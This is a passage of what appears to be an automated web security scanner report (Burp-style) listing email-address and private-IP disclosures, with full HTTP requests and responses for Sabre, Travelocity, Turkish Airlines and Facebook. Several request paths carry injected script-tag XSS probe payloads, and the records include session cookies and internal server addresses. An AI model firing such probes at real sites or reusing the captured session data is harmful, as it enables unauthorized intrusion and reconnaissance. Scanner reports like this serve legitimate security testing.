Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...

22.37. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...

22.38. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...

22.39. http://www.sabretravelnetwork.com/images/home-text.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The following email address was disclosed in the response:

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...

22.40. http://www.sabretravelnetwork.com/js/colorbox/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /js/colorbox/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/colorbox/jquery.colorbox-min.js HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 18 May 2011 20:18:03 GMT
ETag: "1947f7-242a-95f114c0"
Accept-Ranges: bytes
Content-Length: 9258
Connection: close
Content-Type: application/x-javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...

22.41. http://www.sabretravelnetwork.com/js/jquery.equalHeights.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /js/jquery.equalHeights.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.equalHeights.js HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 17 May 2011 21:50:10 GMT
ETag: "888006-12f8-c1890880"
Accept-Ranges: bytes
Content-Length: 4856
Connection: close
Content-Type: application/x-javascript

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights" & "EqualWidths"
* by:    Scott Jehl, Todd Parker, Maggie Costello Wachs (http://www.filamentgro
...[SNIP]...
dren().css({'min-width': currentWidest});
   });
   return this;
};


/*--------------------------------------------------------------------
* javascript method: "pxToEm"
* by:
Scott Jehl (scott@filamentgroup.com)
Maggie Wachs (maggie@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2008 Filament Group
* Dual licensed under the MIT (filamentgroup.com/examples/mit-license.txt) and GPL (filamentgroup.com/examples/gpl-license
...[SNIP]...

22.42. http://www.travelocity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176568
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:04 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
<meta http-equiv='PICS-Label' content='(PICS-1.1 "http://www.classify.org/safesurf/" L GEN TRUE FOR "./" BY "iag@travelocity.com" R (SS~~000 1))'>
...[SNIP]...
<div class="error-txt">Verify your email address follows the example@email.com format. Please do not use special characters.</div>
...[SNIP]...

22.43. http://www.travelocity.com/472a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178468
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:06 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
<meta http-equiv='PICS-Label' content='(PICS-1.1 "http://www.classify.org/safesurf/" L GEN TRUE FOR "./" BY "iag@travelocity.com" R (SS~~000 1))'>
...[SNIP]...
<div class="error-txt">Verify your email address follows the example@email.com format. Please do not use special characters.</div>
...[SNIP]...

22.44. http://www.turkishairlines.com/static/js/plugin/datepicker/date_en.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/datepicker/date_en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/datepicker/date_en.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 3026
Content-Type: application/x-javascript
Last-Modified: Tue, 20 Sep 2011 14:11:30 GMT
Accept-Ranges: bytes
ETag: "547f9d319f77cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:42 GMT

/*
* Date prototype extensions. Doesn't depend on any
* other code. Doens't overwrite existing methods.
*
* Adds dayNames, abbrDayNames, monthNames and abbrMonthNames static properties and isL
...[SNIP]...
yName, getMonthName, getDayOfYear, getWeekOfYear,
* setDayOfYear, addYears, addMonths, addDays, addHours, addMinutes, addSeconds methods
*
* Copyright (c) 2006 Jörn Zaefferer and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*
* Additional methods and properties added by Kelvin Luck: firstDayOfWeek, dateFormat, zeroTime, asString, fromString -
* I've added my name to these methods so you
...[SNIP]...

22.45. http://www.turkishairlines.com/static/js/plugin/jquery-fieldselection.pack.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery-fieldselection.pack.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/jquery-fieldselection.pack.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 1209
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Sep 2011 11:56:37 GMT
Accept-Ranges: bytes
ETag: "e450c52fc376cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:46 GMT

/*
* jQuery plugin: fieldSelection - v0.1.0 - last change: 2006-12-16
* (c) 2006 Alex Brem <alex@0xab.cd> - http://blog.0xab.cd
*/
(function(){var c={getSelection:function(){var e=this.jquery?this[
...[SNIP]...

22.46. http://www.turkishairlines.com/static/js/plugin/jquery.combo/jquery.combo.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery.combo/jquery.combo.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /static/js/plugin/jquery.combo/jquery.combo.min.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Content-Length: 18078
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Sep 2011 11:56:49 GMT
Accept-Ranges: bytes
ETag: "66ffab36c376cc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:01:39 GMT

/***************************************************************************

   thy-combo 2.1.3    : A jQuery date time picker.
   
   Authors:
       Kadalashvili.Vladimir@gmail.com - Vladimir Kadalashvili
       thetoolman@gmail.com
       
   Version: 2.1.3
   
   Website: http://code.google.com/p/thy-combo/
   

* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General P
...[SNIP]...

22.47. http://www.turkishairlines.com/static/js/plugin/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/js/plugin/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/plugin/jquery.cookie.js HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45

Response

HTTP/1.1 200 OK
Content-Length: 4280
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Sep 2011 08:02:27 GMT
Accept-Ranges: bytes
ETag: "a468904b477fcc1:1342"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:58:03 GMT

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opens
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and at least value given, set cookie...
if (arguments.length >
...[SNIP]...

23. Private IP addresses disclosed
There are 130 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


23.1. http://api.connect.facebook.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /crossdomain.xml HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 02 Nov 2011 00:03:40 GMT
X-FB-Server: 10.32.21.120
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:40 GMT
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

23.2. http://api.connect.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /restserver.php?method=fql.query HTTP/1.1
Host: api.connect.facebook.com
Proxy-Connection: keep-alive
Content-Length: 292
Origin: http://connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

query=SELECT%20total_count%20FROM%20link_stat%20WHERE%20url%3D%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F16%2Fhublot-watches-bloghands-on-with-the-classic-fusion-chronograph-yacht-club-de-monaco%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 02 Oct 2011 17:04:42 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.32.1.103
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:42 GMT
Content-Length: 21

[{"total_count":389}]

23.3. http://api.facebook.com/method/fql.query

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /method/fql.query

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /method/fql.query?format=json&query=select%20total_count%20from%20link_stat%20where%20url='undefined'&callback=jsonp1317599923384 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:01:43 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.37.42
X-Cnection: close
Date: Mon, 03 Oct 2011 00:00:43 GMT
Content-Length: 23

jsonp1317599923384([]);

23.4. http://api.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fhublotnation.com%2F2011%2F09%2F23%2Fhublot-watchesa-look-at-the-king-power-dwayne-wade%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
